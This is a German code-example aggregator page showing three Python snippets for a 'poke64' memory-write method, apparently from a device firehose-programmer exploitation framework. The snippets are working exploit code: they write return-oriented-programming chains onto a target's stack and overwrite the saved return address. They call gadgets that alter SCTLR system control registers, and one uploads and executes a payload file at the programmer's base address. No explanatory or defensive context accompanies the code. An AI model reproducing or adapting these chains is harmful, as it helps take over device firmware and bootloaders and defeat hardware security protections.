Python Framework.poke64 Beispiele

Programmiersprache: Python

Namespace / Paketname: fw

Klasse / Typ: Framework

Methode / Funktion: poke64

Beispiele auf hotexamples.com: 3

Python Framework.poke64 - 3 Beispiele gefunden. Dies sind die am besten bewerteten Python Beispiele für die fw.Framework.poke64, die aus Open Source-Projekten extrahiert wurden. Sie können Beispiele bewerten, um die Qualität der Beispiele zu verbessern.

Häufig verwendete Methoden

Anzeigen Verbergen

sendfile(6)

exe_cmd(3)

poke64(3)

peek(2)

copy(1)

copy_and_rebase(1)

exe64(1)

exe64_cmd(1)

firehose(1)

peek32(1)

poke32(1)

poke_payload(1)

Beispiel #1

Datei anzeigen

def rop():
    target = t.get()

    # copy original stack
    FH_FW.copy(0xFEC040a0, 0xFEC03F90, 0x256)
    FH_FW.copy(0xFEC04098, 0xFEC03F88, 8)

    # gadget_set_sctlr_el3
    FH_FW.poke64(0xFEC04060, 0xF803DF38)

    # saved x1 = 0
    FH_FW.poke64(0xFEC04f88, 0)

    # gadget_blr_x4
    FH_FW.poke64(0xFEC03f90, 0xf800e280)

    # super gadget F803E848
    FH_FW.poke64(target.saved_lr_addr, 0xF803E848)

Beispiel #2

Datei anzeigen

def rop():
    target = t.get()

    # super gadget
    #    FH_FW.poke64(target.saved_lr_addr+8, GADGET_INFINITE_LOOP)
    """
    # copy original stack
    FH_FW.copy(target.saved_lr_addr+0x128, target.saved_lr_addr+8, 0x128)

    # copy original saved lr
    FH_FW.poke64(target.saved_lr_addr+0x120, target.saved_lr)

    # set new stack
    FH_FW.poke64(target.saved_lr_addr+0x20, target.saved_lr_addr+0x118)

    # set blr x8 gadget
    FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)

    # set saved_x8
    FH_FW.poke64(target.saved_lr_addr+0xb8, GADGET_RESET)
    # set super gadget
    FH_FW.poke64(target.saved_lr_addr, GADGET_SUPER)
    """
    # FH_FW.poke64(target.saved_lr_addr+0xC0, 0)
    # FH_FW.poke64(target.saved_lr_addr+0x30, GADGET_RESET)
    # FH_FW.poke64(target.saved_lr_addr+0x28, GADGET_RESET)
    # FH_FW.poke64(target.saved_lr_addr+0x20, GADGET_RESET)
    # FH_FW.poke64(target.saved_lr_addr+0x18, GADGET_RESET)
    # FH_FW.poke64(target.saved_lr_addr+0x10, GADGET_RESET)
    # FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)

    FH_FW.poke64(target.saved_lr_addr + 0x1f0, 0x0)  # x1
    FH_FW.poke64(target.saved_lr_addr + 0x108, 0x98)  # x28
    FH_FW.poke64(target.saved_lr_addr + 0x128, 0x1)  # x24
    FH_FW.poke64(target.saved_lr_addr + 0x130, 0x1000)  # X25
    FH_FW.poke64(target.saved_lr_addr + 0x160,
                 target.saved_lr_addr + 0x218 + 0x28)
    FH_FW.poke64(target.saved_lr_addr + 0x200,
                 target.saved_lr_addr + 0x218 + 0x28)

    FH_FW.copy_and_rebase(target.saved_lr_addr + 0x218,
                          target.saved_lr_addr + 8, 0x210)
    FH_FW.poke64(target.saved_lr_addr + 0x210, target.saved_lr)
    FH_FW.poke64(target.saved_lr_addr + 0x110, target.saved_lr_addr + 0x208)
    FH_FW.poke64(target.saved_lr_addr + 0x1a8, GADGET_SCTLR_EL1)
    FH_FW.poke64(target.saved_lr_addr + 0xf8, GADGET_BLR_X8)
    FH_FW.poke64(target.saved_lr_addr + 0xf0, GADGET_SUPER)
    FH_FW.poke64(target.saved_lr_addr, GADGET_ADD_SP)

Beispiel #3

Datei anzeigen

def upload_init64():
    target = t.get()
    FH_FW.poke64(target.fh_base_programmer, 0x12345678)
    FH_FW.sendfile("../device/build/init64.payload", target.fh_base_programmer)
    FH_FW.exe64(target.fh_base_programmer)